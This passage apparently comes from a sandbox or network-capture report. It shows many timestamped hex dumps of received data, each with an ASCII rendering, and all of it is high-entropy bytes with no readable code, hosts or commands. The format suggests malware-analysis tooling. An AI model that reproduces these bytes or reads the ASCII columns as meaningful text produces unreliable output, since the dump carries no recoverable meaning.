                                                                                                                                                                                    2023-01-05 07:58:37 UTC13712INData Raw: a7 5b d6 48 73 6b db 3f ca 3a cd a6 1e 0a c8 d1 f5 66 63 11 66 56 32 66 cc 07 79 ff 50 37 7d 88 ec a2 5b 16 78 92 1a 61 d3 c3 16 f8 13 f3 01 8f c0 ee b4 1f 55 de ac 68 ad 8f a7 f1 7d bf b1 86 db 2a 83 18 5d 1a c6 6f ed 4b cc f6 64 7b 89 81 93 76 c7 0c 14 46 c5 7b f8 17 dc e2 2c 27 d1 95 8c b2 aa 0b 58 82 af 7c a4 d3 b7 e5 37 e3 e6 92 b6 fe 1b 02 2a ce 1f 75 8f 9f 54 ec 1b af 15 9b a9 3a 74 05 69 0a 63 72 91 5b 60 eb 04 6b 78 9c 7b 46 1c 2a ab 76 0a 5d 14 27 55 c4 92 17 10 b3 3b 82 77 2d b2 b2 32 5a 0a e3 7d c3 8d d3 7f b4 4a ce d0 24 9e fe dd 53 27 af cb ca f3 9f ce bd 16 0a bb 23 85 3a ea 54 2f 6b a1 cd b3 5b a5 ba 59 56 ef 37 cd 66 ae 40 66 37 a2 d9 a6 07 b5 ae 47 92 db 30 d2 a2 c3 47 2a f3 c8 de fa c3 de a9 6e de 37 39 e8 ee 72 4e 58 bf 78 d7 d1 8f 3d
                                                                                                                                                                                    Data Ascii: [Hsk?:fcfV2fyP7}[xaUh}*]oKd{vF{,'X|7*uT:ticr[`kx{F*v]'U;w-2Z}J$S'#:T/k[YV7f@f7G0G*n79rNXx=
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13728INData Raw: 11 41 b7 c2 33 8f 33 48 e3 ed 74 00 68 00 3a d3 9d 66 70 0f bf 44 fc 54 41 00 3f 3b e2 45 51 d0 99 db d9 fe 8c 66 36 8b 23 66 a6 f9 11 41 ef 5a 70 49 b3 ea 64 00 70 00 0e f7 a1 0f b7 ed b0 e9 61 44 4b 4f a4 f9 a7 66 c5 d3 04 23 a3 66 67 b6 ba 49 78 bf fb 66 34 89 25 08 f8 d2 ab 48 3d b7 a9 41 ff 02 20 81 9e 04 77 00 31 48 f4 f1 7d 3c 16 10 f9 4c 17 00 8b dd 9f fd 97 49 f8 12 11 41 ba 5a 7d 48 54 cd 2d 81 b0 0a 32 00 62 f6 ad 81 99 01 36 11 5d fe f4 36 13 89 6d 66 93 d9 3b 81 db 04 62 00 70 66 67 b6 be 44 f2 f7 70 8b 7c 44 f3 e7 24 80 8c 41 01 cf 8b 70 63 03 68 49 f8 12 fc 1a b0 ce 1b 42 d8 44 2d 81 b0 04 32 00 62 40 b0 fe ef 40 b3 c6 b1 41 b8 1a 13 0f d3 ee 72 49 f3 e9 36 00 62 00 16 0f d5 f4 33 d2 99 49 3e b7 82 41 fc 31 21 84 9b e9 a1 0b 64 00 38 81 85
                                                                                                                                                                                    Data Ascii: A33Hth:fpDTA?;EQf6#fAZpIdpaDKOf#fgIxf4%H=A w1H}<LIAZ}HT-2b6]6mf;bpfgDp|D$ApchIBD-2b@@ArI6b3I>A1!d8
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13744INData Raw: 85 53 54 62 11 63 15 15 ba 32 19 8c 7a 02 0e fb 9b 97 60 65 0e a7 78 12 f6 f6 73 8b 26 c6 65 fc b2 db 8c 6c 34 eb c9 1b 84 ba c3 82 0d 8a 86 f5 ac 1f a4 6b 2b 2f a6 1c c7 7e bf 85 13 4e b2 f2 e5 43 a5 7f 31 73 a0 08 cd 22 b8 91 5e 12 e9 e6 ed 87 cf 78 71 b7 cb 0f d4 e6 80 96 40 d6 c1 e1 c0 cb 7b 71 00 fb 6c 06 f8 aa 6f 9f 6d 9a 77 e8 8c 0f 11 76 5c 3f 07 01 e3 6e 58 98 65 5e 1d ef e2 b1 1c c2 6b 81 59 b5 d3 d0 16 2c 54 e0 14 5b a1 75 60 c5 75 45 6d b2 cc 14 7b 2b 18 24 7e 5c cf 39 d0 cc 5c 09 81 bb f6 58 ca 22 6a 68 ce 55 d6 fd e8 cb 42 cd a9 bc e9 9c a5 25 29 ac b2 52 9e a1 b0 df 0b 91 a8 a8 f3 c0 a3 31 23 f0 b5 46 85 65 87 d8 03 55 c2 af b3 04 c8 36 3a 34 8d 41 a9 29 74 d1 2e 19 76 a6 c2 48 6f 3f 16 78 62 48 b6 ed 19 d6 62 dd 1c a1 9e 8c 04 38 0d bc 55
                                                                                                                                                                                    Data Ascii: STbc2z`exs&el4k+/~NC1s"^xq@{qlomwv\?nXe^kY,T[u`uEm{+$~\9\X"jhUB%)R1#FeU6:4A)t.vHo?xbHb8U
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13760INData Raw: 70 4d e3 d9 58 c6 f1 c0 78 81 9c 08 77 00 64 41 f8 c2 54 41 6d bc b5 66 67 c8 3e 89 6e 49 b0 ea 71 00 77 00 25 8b 70 f8 54 41 95 c0 4d 19 5b c5 15 f7 b5 fd 1c f8 82 d8 11 41 e5 fe 95 11 1f 11 23 09 64 0f a0 e9 8d bf 8c ff 79 81 98 02 77 00 64 66 a1 ea f2 d6 6a 0f c7 54 4d 00 15 41 44 d0 57 f7 af 84 ac f9 02 f7 a0 66 73 f7 a0 2a 6a e9 7b 82 70 00 78 c9 70 80 8b 5d 8f 81 a5 2c 11 d7 53 e9 a1 c2 78 00 b9 c0 9a 8f 97 fe ce 49 fe 01 41 8b 6c 66 85 d7 cb 49 e3 c1 74 00 68 00 8c c7 37 0f a4 c7 13 ff b8 41 ed 09 32 f6 e5 40 68 fa 16 bf 7f 57 3a 81 9d 04 31 00 75 49 14 f8 02 81 8e ca 5d 48 6d ac a7 02 29 8b 49 66 80 c6 12 5d 9c 68 d9 05 64 49 f9 19 54 44 79 da 16 0f d2 f1 79 41 89 c3 07 44 fe 1b 11 81 95 22 49 49 b3 c1 66 00 70 00 0e d3 a2 45 fe 19 c7 d9 13 81 96
                                                                                                                                                                                    Data Ascii: pMXxwdATAmfg>nIqw%pTAM[A#dywdfjTMADWfs*j{pxp],SxIAlfIth7A2@hW:1uI]Hm)If]hdITDyyAD"IIfpE
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13776INData Raw: 7a 81 8d 04 70 00 68 2c 1e 8b 70 41 02 c1 80 05 19 1b 86 36 b3 c8 30 e9 7a 08 8c ff 67 31 3b f7 a6 66 70 0f cb cd 3e 81 8e 08 72 00 32 81 9b 80 67 7c 6a 41 fa 12 3e 0f 86 cc 34 0f c0 cc 20 0f d1 e1 73 89 20 04 86 d5 0e ff b2 49 78 b7 fe 48 f4 ef 73 00 64 00 b2 e1 72 80 8f e0 16 0f cc f9 63 8b 78 41 02 c9 80 44 f3 ce 93 d1 f3 e9 d4 3a 3a 66 89 0f a1 f5 8b d1 b6 40 b1 fd 64 f9 36 51 02 45 f9 cf 03 0c 46 41 29 66 e9 fd 5c 77 37 f6 f5 62 3d 63 be 48 67 f1 9b 3a 09 fe 9d e9 75 d0 68 00 3a 8b 95 40 f1 e7 d1 41 f7 df 07 66 7d ab c8 41 39 45 72 e8 29 5e 2e 41 a5 c4 71 d2 9b 66 36 c1 b1 7c 33 5c 73 fe a0 5e 16 44 67 47 9a 66 a4 d7 6a 9d 2f 41 2f 41 d6 98 33 f6 e0 48 01 fc 31 5d 67 b7 b0 41 2e 48 3e bf 8f e9 9f 0e 9a ff 37 0f 84 0a 2b 81 b2 01 68 00 73 66 36 f7 f4
                                                                                                                                                                                    Data Ascii: zph,pA60zg1;fp>r2g|jA>4 s IxHsdrcxAD::f@d6QEFA)f\w7b=cHg:uh:@Af}A9Er)^.Aqf6|3\s^DgGfj/A/A3H1]gA.H>7+hsf6
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13792INData Raw: 82 c1 ab 03 8d cf 54 f7 a3 51 57 0f a7 45 48 c0 3f 81 cf 5d 00 14 41 44 e1 ee 85 df db 7c 33 fc 8f ff a5 40 49 cd 3e 85 de 81 8c df 14 f4 03 57 14 f7 ed 41 48 fa 30 80 8f 70 42 2c 53 66 3e ba 8a d7 28 48 07 ed 3e 03 f7 41 32 c3 23 80 ab 28 3f 0f d4 d3 75 31 69 24 2c 44 e1 ce 8b 4d 51 db 2b 03 9b 55 ab 41 8c c3 8f f5 70 c1 be 02 82 f8 25 f7 a9 41 b3 eb 96 4e 64 6a 0e 85 bd 66 36 81 cd 48 41 57 11 c1 a3 75 32 c0 cd 4d 26 31 6c 24 a9 c7 29 c1 b8 fa 6e 4d 16 db 8e e9 e9 8b 8e ff cd ce a3 c6 73 e9 97 60 8f ff 8e 41 c6 d3 80 f9 36 c1 a7 03 8a 41 c5 db 23 c1 b3 03 29 81 98 a7 1f 05 33 f9 34 d1 bc 66 e5 ff f9 05 72 3a 9e e9 f2 53 94 ff 3b 8b 79 36 57 44 fe 09 3f 81 a2 06 72 00 32 40 a2 e5 23 40 e8 dd 23 49 14 ed 57 44 fc 0e 37 f6 b1 66 32 0f 8c ef 2b 81 9b 04 68
                                                                                                                                                                                    Data Ascii: TQWEH?]AD|3@I>WAH0pB,Sf>(H>A2#(?u1i$,DMQ+UAp%ANdjf6HAWu2M&1l$)nMs`A6A#)34fr:S;y6WD?r2@#@#IWD7f2+h
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13808INData Raw: a1 66 3e bb 80 40 89 c5 28 0b bc 40 87 c5 04 41 7f b6 87 4d fa 48 7f 9c 3e bf 9a 81 82 58 21 1e 05 66 76 0f d1 d5 31 8f 68 66 84 dd 3f 81 f4 eb 69 6f 04 41 ef 2a 3b 81 f0 04 62 00 70 f5 29 33 98 41 f2 f3 d8 96 79 05 77 ff ac f5 8b 66 b3 fb 46 11 27 66 29 33 8d 66 b6 d7 97 31 71 24 28 e9 58 bc 8c ff 64 c3 8b 20 a0 fe 97 f5 3b 63 ac 40 b1 fd 62 f5 8f 48 67 fb 9b 36 a5 fe 9d e9 47 06 94 ff 3a 0f 34 fd 71 80 92 d6 46 34 40 3b a8 66 3d ba 85 78 99 d6 fc 00 73 0f f3 52 12 05 75 48 fa 15 96 b4 72 00 db 62 b1 fc 8f ff a0 e9 52 33 8a ff c6 d2 b4 ca 74 41 e0 d8 f3 c2 dc 78 ba 34 89 e9 67 dc 7f 00 88 e7 79 63 83 45 f3 e9 02 41 f3 fe d6 22 8b a5 68 09 68 4d f8 1a 3e 8b 73 08 35 c0 ba 95 21 3b a9 40 c4 d5 2b 81 b2 10 68 00 73 41 78 b7 db 40 b5 cd 42 49 ed 03 14 81 cd
                                                                                                                                                                                    Data Ascii: f>@(@AMH>X!fv1hf?ioA*;bp)3AywfF'f)3f1q$(Xd ;c@bHg6G:4qF4@;f=xsRuHrbR3tAx4gycEA"hhM>s5!;@+hsAx@BI
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13824INData Raw: 7f ac b1 5e f8 0f 36 33 f8 f9 31 84 86 f7 b5 f5 8b f7 eb f7 b3 f5 99 c2 51 09 73 f9 a6 cf c8 f7 a2 f9 b6 c7 66 f9 21 41 00 db 53 3c 54 f6 b3 80 98 d8 2c f5 d8 fc d4 f9 88 e9 1f c6 89 ff 7b 8b 68 66 a3 e8 67 9d b7 81 88 05 26 c9 3c 65 3f 8b 65 48 b3 ca 8e 66 22 0f c6 d4 21 89 71 0f dc ea 71 80 8b ee 3f 81 8b 04 72 00 32 8b 75 41 43 d1 81 b6 6d fe 88 f7 f7 d2 59 31 5c 2d 55 78 77 0c e3 c8 8b ca 47 fc 97 0f f6 fa fe 04 31 48 fe c8 9e b9 d7 fe 8d 41 cd c8 9a f5 31 c1 a0 03 33 3a a1 41 b0 c0 0e 35 b6 5e 91 f9 33 d1 f2 49 e3 fa eb 14 fb 6d 37 3a a1 41 b0 e8 96 27 06 74 8d fa d6 07 32 4c e9 1e f5 d7 ba d2 15 44 fc 4e 39 41 7a bf a3 48 fd f6 a4 48 b3 c6 68 00 70 00 24 0f d8 ea 33 0f 9a f2 13 99 11 45 ed 0b 3a c1 e8 9f 23 0f c7 d7 29 8b 61 40 4d f1 57 44 f0 ef 8f
                                                                                                                                                                                    Data Ascii: ^631Qsf!AS<T,{hfg&<e?eHf"!qq?r2uACmY1\-UxwG1HA13:A5^3Im7:A't2LDN9AzHHhp$3E:#)a@MWD
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13840INData Raw: 30 00 8b 10 4c fd 97 48 10 c0 3a 3b e9 48 76 d8 9e 86 b2 0a 72 81 c9 02 62 00 70 e9 91 22 7b 00 11 41 c6 c3 8c 40 36 50 25 80 9a ab 03 0c 46 66 35 33 aa 41 8d c8 11 44 3e be b4 41 2f 48 07 c9 32 84 c1 41 e3 fd 47 27 56 1b 3b 03 86 e9 11 6a 79 00 36 8b 67 41 f9 6b 36 41 94 d0 31 80 a8 84 32 8a 3c 08 57 45 7a a4 87 dc 25 0f d9 c0 7b 0f d8 e0 53 49 e9 eb 71 00 77 00 57 45 7a 40 b2 66 20 33 b3 0f 97 e8 04 44 7f 48 ab 66 32 0f bf 41 c7 d0 34 89 34 08 f8 41 fd 03 73 d2 92 49 f1 ea 6c 00 73 00 36 d3 f9 45 fe 02 33 33 a7 e9 38 f9 cc ff 23 0f b9 e9 78 3a 76 00 78 cb d8 4e c1 0c 77 44 57 c3 8a 41 c4 c6 15 41 f1 f0 5f 64 1f 03 3f f7 f4 53 20 e6 32 f9 25 f7 aa e9 5c 8d 9b ff 38 0f d2 f8 54 8b 70 41 02 c1 31 85 9c f9 2c f7 b6 96 68 25 33 2d a6 5b 9e 61 8a 66 32 85 ea
                                                                                                                                                                                    Data Ascii: 0LH:;Hvrbp"{A@6P%Ff53AD>A/H2AG'V;jy6gAk6A12<WEz%{SIqwWEz@f 3DHf2A44AsIls6E338#x:vxNwDWAA_d?S 2%\8TpA1,h%3-[af2
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13856INData Raw: 9e 83 fe fb 8d f5 e3 c2 9d ca 88 f5 81 e9 cc fc 88 44 0b c3 3d 89 13 25 94 41 85 c6 c9 22 31 2f 38 2b 89 48 f2 e4 87 ff ce ff 8c 45 f3 e9 2c 8d 56 0c 54 41 e7 ea 99 85 f4 fb 8c 4d fc 1a f1 f9 21 44 6d c3 29 8b 30 08 c7 81 9d a2 49 e8 66 41 f9 4a 67 84 cb f8 3c 81 b5 02 64 00 72 40 08 ef 2f 0f d5 c3 81 79 09 08 77 f7 e4 e9 c7 d2 8e ff 2d 8b 92 66 aa 5f 39 66 35 0f c3 f2 9a 16 63 06 31 f5 f4 eb 76 00 64 00 9b e2 da fb 9d f5 a1 cb 81 b3 19 00 77 c1 f3 03 7a ca 82 f6 a3 9a 85 da b3 fb 54 41 ee 6c 24 3b 93 41 27 41 e3 f8 44 14 53 41 92 c5 bb 66 77 0f d4 c3 31 58 91 48 10 d2 3b 03 eb 41 8a e3 9e 30 cc fb 8d 35 94 74 af 1a 27 66 67 b6 8a 31 73 24 6e 48 16 c0 9e 2c aa 06 72 ff fa f5 9b c1 b8 02 9d 48 f2 f8 1c 79 c9 2c 82 d8 9e d6 24 05 72 d1 f0 f8 04 41 f1 f9 86
                                                                                                                                                                                    Data Ascii: D=%A"1/8+HE,VTAM!Dm)0IfAJg<dr@/yw-f_9f5c1vdwzTAl$;A'ADSAfw1XH;A05t'fg1s$nH,rHy,$rA
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13872INData Raw: eb 8f 37 40 5f d7 11 44 6b bb a0 d2 d8 41 e9 12 31 84 b9 49 f2 c2 73 00 31 00 46 d3 36 f6 a5 74 f3 c2 67 24 99 78 f1 f2 5d 57 e1 17 a6 ca 57 41 f4 fe c1 2c e5 c2 b5 4c 6f 5c 59 f3 31 80 91 ba 7c ca 24 66 70 0f c9 dd 9e 41 57 05 72 66 76 8b 6c c0 a9 98 28 c0 bc 17 fd 4e 33 66 f4 e7 6f 68 24 0a 89 c1 d5 0f 2a 81 9e 06 68 00 73 66 36 d3 d8 41 7a bf 8c 48 6b cf 14 44 bb 4e 6a 48 7f bf 96 66 84 d7 78 bf c9 9c 13 41 78 be 9b 40 f2 d7 95 8f 64 66 7f cf 21 81 8a 56 44 ad 56 40 b5 cf 8c 41 ef 3a 8a 49 b3 c2 66 00 70 00 9d 41 49 cb 8e 33 ca 81 82 4f 3f 95 59 f8 9b ae c0 07 62 49 f1 eb 69 00 73 00 32 0f 87 0b 30 32 bd 4d 6b b7 b4 44 3d b7 a6 41 8e c1 0e 90 33 8a b1 4c 52 c4 34 f6 a6 fe ac 45 7d b7 f6 41 9c c1 a2 f4 29 f6 aa 66 78 c8 70 fe b4 41 b7 e8 11 41 f6 c3 73
                                                                                                                                                                                    Data Ascii: 7@_DkA1Is1F6tg$x]WWA,Lo\Y1|$fpAWrfvl(N3foh$*hsf6AzHkDNjHfxAx@df!VDV@A:IfpAI3O?YbIis202MkD=A3LR4E}A)fxpAAs
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13888INData Raw: 70 41 67 c9 9a c3 9b 0b 31 f9 a4 c8 9e 34 66 07 72 57 7b 0f dd fb 41 1c 4c 66 7c ba 80 69 71 d2 92 66 36 3b 87 5f 3a 63 e9 49 59 db 3c 03 ab e9 44 88 89 ff c7 c1 ad 41 44 d8 e5 eb ba 6f 9d 1f a3 c3 72 81 83 00 32 eb 33 0f fa f8 8c f7 ac 41 34 e9 0d f2 cd ff 95 d9 99 ec 5c 0c 73 4d 14 c9 70 3a 99 41 81 c7 38 f5 3f 03 f3 e9 39 f6 8c ff 29 89 32 08 3f 0f 86 c4 b3 c4 6e 9c 25 8f 73 0f 85 c2 97 0f b0 e0 21 81 99 04 77 00 31 66 34 8b b6 48 07 c3 a0 cc 73 8b 60 33 b5 2d 4c 24 f5 08 37 f6 f5 91 82 d0 82 05 a5 1e bc 6d ca c1 a2 02 25 48 67 cd 3a 63 98 31 35 24 28 48 14 c0 2c 03 aa e9 13 10 9d ff 31 f7 b9 41 8c c1 8f f9 70 c1 bc 03 4b 5f 33 40 84 d7 54 c1 b5 9d 34 31 64 24 7c ac a0 69 6e 40 f5 fe ad f9 29 63 bb e9 33 26 98 ff 99 7b c1 0b 73 35 92 47 5b 4a 31 84 a6
                                                                                                                                                                                    Data Ascii: pAg14frW{ALf|iqf6;_:cIY<DADor23A4\sMp:A8?9)2?n%s!w1f4Hs`3-L$7m%Hg:c15$(H,1ApK_3@T41d$|in@)c3&{s5G[J1
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13904INData Raw: 0c 31 6e 24 31 d3 93 66 32 c1 ac 3e 70 5b 34 81 8b 27 00 b4 49 f9 7a 63 ab f9 16 44 53 db 33 84 b3 48 32 f9 9c 0a df f8 9b 49 f3 e9 3a 00 62 00 39 8b 61 40 b3 e5 95 44 3e a4 b8 2c 11 bd 98 23 3a 33 fd 49 6d bf 9d 48 a9 cd 7b 49 80 c6 3e 1d a6 59 3f 81 95 d4 01 19 58 48 b3 c1 16 bd 53 49 3a 0f c8 ef 57 ff b8 48 88 c1 2c 63 9f 40 f2 dd 40 48 87 d1 20 c1 b2 05 3f f7 e8 66 7a b6 9f 41 6b 4c 9d 41 3d b7 8c 48 8f c1 28 fe b6 66 78 ba cc 84 13 c1 82 e0 2c 33 8b 40 f2 d5 c3 40 7f 9b ad 40 85 d5 3e 81 db 08 75 00 77 49 ed 0a 14 d3 d7 49 e3 e9 74 00 68 00 3b d3 92 41 ba 29 80 33 98 e9 3d 91 71 00 7e 8b 64 44 7a ca 29 81 aa d7 63 26 28 66 34 ff b6 44 ef 4e 7a 48 b3 c6 6e 00 70 00 9d 66 48 d6 41 45 b8 08 3c 0f dc d8 25 c0 a2 7f 77 8b 60 49 f1 c2 6c 00 73 00 37 3a e5
                                                                                                                                                                                    Data Ascii: 1n$1f2>p[4'IzcDS3H2I:b9a@D>,#:3ImH{I>Y?XHSI:WH,c@@H ?fzAkLA=H(fx,3@@@>uwIIth;A)3=q~dDz)c&(f4DNzHnpfHAE<%w`Ils7:
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13920INData Raw: 96 82 28 0f ce cb 54 45 6d be ba 41 e7 02 15 41 f6 f1 33 43 3d 81 9a 04 64 00 72 66 73 0f d9 c9 16 45 67 4a ba 44 fc 4c 14 00 31 33 b8 e9 4b 63 7b 00 cd c1 04 41 f1 fd 27 38 32 50 46 0c 15 66 34 0f d4 f0 28 23 b2 66 73 81 aa a1 0d 41 30 f8 86 48 14 c9 c4 f6 b2 bf 3f 03 95 e9 01 a6 35 00 37 c3 34 8a b4 66 32 0f bc 4d ba d8 9c 7e ec fe 9b ff ba 35 09 45 6d 79 31 81 95 dd 7e eb 43 44 0b fb 58 62 6c b0 6e e9 01 13 30 00 6d ca 99 1f 01 04 73 81 8c 04 31 00 75 e9 62 ec 9e ff 72 00 20 27 b9 67 f1 fc a4 23 8d 4f 36 52 75 31 79 24 3a 0f 2e d1 33 5a 7f 63 ab e9 15 73 61 00 24 c3 eb 66 b0 de 34 33 37 c0 a2 2e 14 d3 fc 41 ed 00 85 0f d3 fe 32 8b 45 49 b0 c2 71 00 77 00 25 33 81 45 08 c1 97 81 b6 29 10 82 08 f9 b6 c6 33 f9 f4 ee 17 14 d6 74 8a 40 08 dc 95 de 88 f5 a9
                                                                                                                                                                                    Data Ascii: (TEmAA3C=drfsEgJDL13Kc{A'82PFf4(#fsA0H?574f2M~5Emy1~CDXbln0ms1ubr 'g#O6Ru1y$:.3Zcsa$f437.A2EIqw%3E)3t@
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13936INData Raw: 31 0f 9e a0 a5 3f df d7 0e 6e d3 4e ce 5e c4 39 2f cb aa a7 ba fb b2 d0 42 aa b9 49 92 9a af 3e 8d c5 65 31 4e 24 34 0f cc ff 81 5f 3f 63 dc e9 8e 9a 80 ff 2d 8b 43 66 73 b8 de 69 6a ca 0e 41 f2 e8 0b 5a 70 8a 3c 08 36 b0 77 41 8d c0 7b 81 a3 0a 70 00 68 45 69 c3 ff 0e 78 81 9f 04 77 00 64 45 f9 02 73 85 91 f9 34 33 ad f8 32 f7 a7 f9 c4 f8 34 c1 b7 02 2d 85 ae f9 73 81 92 96 30 4e 0f e9 73 67 8b ff c4 81 82 de 5f c9 0b 55 14 41 29 eb 53 3c 54 5d 81 18 37 03 77 ff f9 35 b6 4d 07 25 24 80 8e 34 ca 57 53 04 54 66 29 0f c5 f8 37 0a ca 5f 3d 63 b7 4c 67 c0 9b a4 f6 fd 9d f5 38 63 85 e9 55 44 74 00 ce ca 34 53 46 14 40 41 29 45 08 e8 23 f6 b6 7f 20 63 a1 41 f7 fe 38 48 76 fa 9e 4d f3 00 72 f8 3d cd a3 c5 73 41 9f c1 4e 21 1a 11 70 50 13 41 f6 e0 bd 47 3e 63 f4
                                                                                                                                                                                    Data Ascii: 1?nN^9/BI>e1N$4_?c-CfsijAZp<6wA{phEixwdEs4324-s0Nsg_UA)S<T]7w5M%$4WSTf)7_=cLg8cUDt4SF@A)E# cA8HvMr=sAN!pPAG>c
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13952INData Raw: de 65 d0 02 9a 80 39 06 31 48 76 fb 9e 78 11 ff 8d e9 bf 53 8d ff 27 c3 2d 0f c5 02 89 ce b1 de 99 81 95 dd 4b 2b 60 49 b3 c2 63 00 70 00 e8 d2 0b 44 45 c3 e3 fa a7 f1 f6 ca 53 03 69 03 73 80 92 68 16 c1 a9 4b 85 d9 36 80 d9 5d 13 c1 a5 0c 25 d0 ba c0 e0 f2 e3 fb a1 7d 02 42 3b c1 ad e7 70 80 85 a9 11 81 b6 32 7b 66 e1 ca 23 f6 a0 85 bb 41 f3 e8 c7 c1 fb 5a 30 3b 96 41 92 d8 14 ff fb 41 50 d8 16 42 e3 0c 77 0f b7 f6 b0 d2 3a 42 53 5b 2c 81 9c 02 32 00 62 66 f9 0e 67 97 b5 48 78 ba c3 44 34 8b 65 49 e5 c2 76 00 32 00 51 d3 85 f9 b9 ca 9a 31 53 fb ce f8 26 31 7b 24 2d 0f cd dc b3 f3 6d 4f 76 67 33 40 85 c7 ea 48 0a f6 35 80 89 e1 2c 63 bb f8 7a 03 93 ff 96 41 97 e3 33 fe b9 e9 ce c4 8d ff 8e 48 67 fa 9b a8 26 fa 9d e9 0a 82 91 ff 7c ce 9e 50 58 05 75 ff bd
                                                                                                                                                                                    Data Ascii: e91HvxS'-K+`IcpDESishK6]%}B;p2{f#AZ0;AAPBw:BS[,2bfgHxD4eIv2Q1S&1{$-mOvg3@H5,czA3Hg&|PXu
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13968INData Raw: f2 ff 0a 66 a3 c7 21 81 99 04 77 00 31 41 fe 3a 82 33 9f f9 9b 89 4b fb 9d f6 b4 e1 0e 41 50 db 36 bb 60 36 5b 7f 11 44 6b 47 ab 66 76 0f dc de 16 41 e1 5a 7b 66 32 87 ea 41 7a 9f b4 41 d7 95 ee 41 e0 d3 2f 87 ab 41 e7 02 3a 81 9e 04 31 00 75 45 6d dc 21 0f d9 d3 73 d2 89 45 fb 19 2c 33 ac 41 f6 eb a2 18 cc 0a 8f 41 b5 c3 33 ff f1 41 6d cb 89 41 a9 cb 70 e9 ac 7c 3b 00 8a c8 33 3b b1 0f ba 41 61 31 66 24 31 f6 ad 96 3a 0f dc d3 7c 03 aa 41 2c f9 9c 48 11 c0 7a 03 9a e9 b5 87 95 ff 3a 81 9e 04 31 00 75 41 fc 11 91 f9 37 3a ea 33 b5 f9 b1 c2 6a 40 f7 d5 80 d2 c9 f5 7a ca 82 41 92 c5 7e 81 f0 59 4f 4d 08 41 e9 f8 b6 48 84 5b 3e ca 8d 57 f6 ff d5 48 90 28 54 41 69 fa 41 14 4c 66 32 0f ca f8 74 3a b3 66 6c fd 3b f9 3a 63 e0 f5 9b 4c 73 c2 81 86 30 ff 88 f9 57
                                                                                                                                                                                    Data Ascii: f!w1A:3KAP6`6[DkGfvAZ{f2AzAA/A:1uEm!sE,3AA3AmAp|;3;Aa1f$1:|A,Hz:1uA7:3j@zA~YOMAH[>WH(TAiALf2t:fl;:cLs0W
                                                                                                                                                                                    2023-01-05 07:58:37 UTC13984INData Raw: 7b 24 29 0f cd cb 73 c0 8b 8e 31 0f d2 e1 7d 41 2e 49 c6 c0 e2 33 59 04 8d 77 e8 05 32 66 6d b6 6e 41 4a c8 f9 4e 75 48 b0 ee 73 00 77 00 b6 e3 3a 0f ff 66 23 0f c6 ec 28 f6 a6 66 fe 5e 39 9c 3d 0f c8 eb 24 f6 a7 8f 34 45 58 d3 30 b5 96 49 f2 eb 73 00 31 00 35 d2 9a 41 ef 2b 14 41 b7 f6 9a 41 43 ea 81 5c ae f6 88 41 ba 03 8c f7 a6 53 2c f7 a1 66 73 81 99 e6 3e 0f ca 40 85 c4 ea 66 e2 fd 13 d3 b2 49 e5 eb 7e 00 32 00 04 41 7f 4f 85 41 7c bf 99 48 3e bd 9a 41 fe 43 68 40 f8 ee 7a f7 b7 66 7f c1 85 41 fa 5b 7f 66 3e ac be f4 3f 81 bf 78 39 49 04 41 eb 4b 74 81 ab c1 07 b5 79 41 b8 13 13 0f c9 da 3f 40 f2 cd b2 49 e3 ea 74 00 68 00 15 44 78 bb c4 0f de dd 36 8b 4e f8 9b d9 90 fd 9d 4d fb 1a 29 8b 01 08 3e 81 f3 0c 75 00 77 d2 b5 66 7d be fd 66 6d ba 91 10 5e
                                                                                                                                                                                    Data Ascii: {$)s1}A.I3Yw2fmnAJNuHsw:f#(f^9=$4EX0Is15A+AAC\AS,fs>@fI~2AOA|H>ACh@zfA[f>?x9IAKtyA?@IthDx6NM)>uwf}fm^
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14000INData Raw: 32 0f 8c c0 34 ff b7 31 78 24 14 41 3d a3 92 41 28 f6 a9 89 9a 4c de 03 31 41 8a c0 24 2a be 66 32 0f 84 de 26 31 74 24 20 ff b0 66 78 ba c2 e6 3d 0f cb d9 3f 4d 49 dd db bc 21 f8 8f ff af f5 15 3b 9c 0f fe 41 f5 fe 3d 81 a3 00 6b 34 17 d1 a5 49 87 c5 01 29 ec 34 36 50 57 45 5e c2 32 0f db c2 43 3c 16 41 3a 48 13 ff 24 03 ac e9 29 ad 30 00 7a 85 12 5c 6d 00 3a 8b 76 25 62 48 f1 ec 48 00 73 00 9e e5 09 04 75 ff b8 66 93 c3 5f 19 cb e9 cd 58 89 ff 29 0f b9 e9 8f 43 35 00 34 3a af 41 e5 f3 74 08 03 62 9a f5 31 d1 ab 41 22 41 a5 e9 78 81 9c 11 39 77 11 44 43 1c 16 66 27 0f ce ca 21 d3 92 66 33 0f 87 cb 34 59 32 3a 92 4d 11 db 7b 03 91 e9 14 c5 92 ff 3b 63 be f9 7d 03 b4 e9 01 42 9c ff 8d e7 7e 8b 6c 66 6b eb 4e 66 32 8b 5e f5 57 41 7a be a2 48 e5 c6 74 00 32
                                                                                                                                                                                    Data Ascii: 241x$A=A(L1A$*f2&1t$ fx=?MI!;A=k4I)46PWE^2C<A:H$)0z\m:v%bHHsuf_X)C54:Atb1A"Ax9wDCf'!f34Y2:M{;c}B~lfkNf2^WAzHt2
